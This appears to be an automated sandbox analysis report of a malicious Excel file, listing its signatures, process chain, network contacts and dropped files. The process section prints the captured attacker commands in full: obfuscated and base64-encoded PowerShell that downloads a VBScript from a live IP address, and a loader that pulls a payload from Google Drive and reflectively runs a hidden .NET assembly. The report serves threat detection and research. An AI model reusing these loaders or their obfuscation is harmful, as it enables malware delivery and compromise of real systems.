Malware Analysis Report

2025-08-05 11:48

Sample ID 241031-egx25s1kdr
Target d4571d781718a7871ea17ac8e91e17623319b921de2c9fb3a369f466cfde8683.xls
SHA256 d4571d781718a7871ea17ac8e91e17623319b921de2c9fb3a369f466cfde8683
Tags
defense_evasion discovery execution
score
10/10

Analysis Overview

Threat Level: Known bad

The file d4571d781718a7871ea17ac8e91e17623319b921de2c9fb3a369f466cfde8683.xls was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution

Process spawned unexpected child process

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Evasion via Device Credential Deployment

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Uses Volume Shadow Copy service COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy WMI provider

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Analysis: static1

Detonation Overview

Reported

2024-10-31 03:55

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-31 03:55

Reported

2024-10-31 03:58

Platform

win7-20240903-en

Max time kernel

121s

Max time network

124s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\d4571d781718a7871ea17ac8e91e17623319b921de2c9fb3a369f466cfde8683.xls

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2656 wrote to memory of 2632 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe
PID 2656 wrote to memory of 2632 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe
PID 2656 wrote to memory of 2632 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe
PID 2656 wrote to memory of 2632 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe
PID 2632 wrote to memory of 1924 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2632 wrote to memory of 1924 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2632 wrote to memory of 1924 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2632 wrote to memory of 1924 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2632 wrote to memory of 2032 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2632 wrote to memory of 2032 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2632 wrote to memory of 2032 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2632 wrote to memory of 2032 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2032 wrote to memory of 2000 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2032 wrote to memory of 2000 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2032 wrote to memory of 2000 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2032 wrote to memory of 2000 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2632 wrote to memory of 1512 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 1512 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 1512 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 1512 N/A C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe C:\Windows\SysWOW64\WScript.exe
PID 1512 wrote to memory of 2860 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1512 wrote to memory of 2860 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1512 wrote to memory of 2860 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1512 wrote to memory of 2860 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2860 wrote to memory of 2144 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2860 wrote to memory of 2144 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2860 wrote to memory of 2144 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2860 wrote to memory of 2144 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\d4571d781718a7871ea17ac8e91e17623319b921de2c9fb3a369f466cfde8683.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe

"C:\Windows\sYstEM32\wiNdoWSpoWersHelL\v1.0\poWerSHelL.EXe" "PowErsHELl.Exe -eX BypASS -nOp -w 1 -c DevIcecREDENtIALdEpLOymENt ; iEx($(ieX('[SyStem.tEXT.ENCODInG]'+[cHar]0x3a+[CHAr]0X3a+'UTf8.GetsTRIng([SYStEM.ConVert]'+[CHAR]0x3a+[cHAR]58+'fromBase64striNG('+[char]0x22+'JFE3MiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJkRUZpbklUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXRMSmtpSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnQUFrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdwbnJUUSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRUJXbHJNcyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1SEFyY1hhTHpqKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3bnhudHV1RWUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBiZE93eGdSR1lCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRNzI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFblY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWUudmJzIiwwLDApO3NUYVJ0LVNsRUVQKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWUudmJzIg=='+[CHar]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX BypASS -nOp -w 1 -c DevIcecREDENtIALdEpLOymENt

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\demda8pj.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF143.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF142.tmp"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemethebestthingswithgreatneedswithgoodforme.vbs"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[...]';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"

Network

Country Destination Domain Proto
US 8.8.8.8:53 acesso.run udp
US 172.67.162.95:443 acesso.run tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.180.3:80 c.pki.goog tcp
US 198.46.178.151:80 198.46.178.151 tcp
US 172.67.162.95:443 acesso.run tcp
US 198.46.178.151:80 198.46.178.151 tcp
US 198.46.178.151:80 198.46.178.151 tcp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.187.193:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.18.190.73:80 crl.microsoft.com tcp

Files

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

C:\Users\Admin\AppData\Local\Temp\CabE927.tmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\633SXO0D\greatthingswithmegoods[1].hta

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

\??\c:\Users\Admin\AppData\Local\Temp\demda8pj.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\demda8pj.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\CSCF142.tmp

C:\Users\Admin\AppData\Local\Temp\RESF143.tmp

C:\Users\Admin\AppData\Local\Temp\demda8pj.dll

C:\Users\Admin\AppData\Local\Temp\demda8pj.pdb

C:\Users\Admin\AppData\Roaming\seemethebestthingswithgreatneedswithgoodforme.vbs

\??\PIPE\srvsvc

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-31 03:55

Reported

2024-10-31 03:58

Platform

win10v2004-20241007-en

Max time kernel

143s

Max time network

141s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\d4571d781718a7871ea17ac8e91e17623319b921de2c9fb3a369f466cfde8683.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1040 wrote to memory of 3484 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 1040 wrote to memory of 3484 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\d4571d781718a7871ea17ac8e91e17623319b921de2c9fb3a369f466cfde8683.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 acesso.run udp
US 172.67.162.95:443 acesso.run tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.180.3:80 c.pki.goog tcp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 198.46.178.151:80 198.46.178.151 tcp
US 8.8.8.8:53 95.162.67.172.in-addr.arpa udp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 151.178.46.198.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
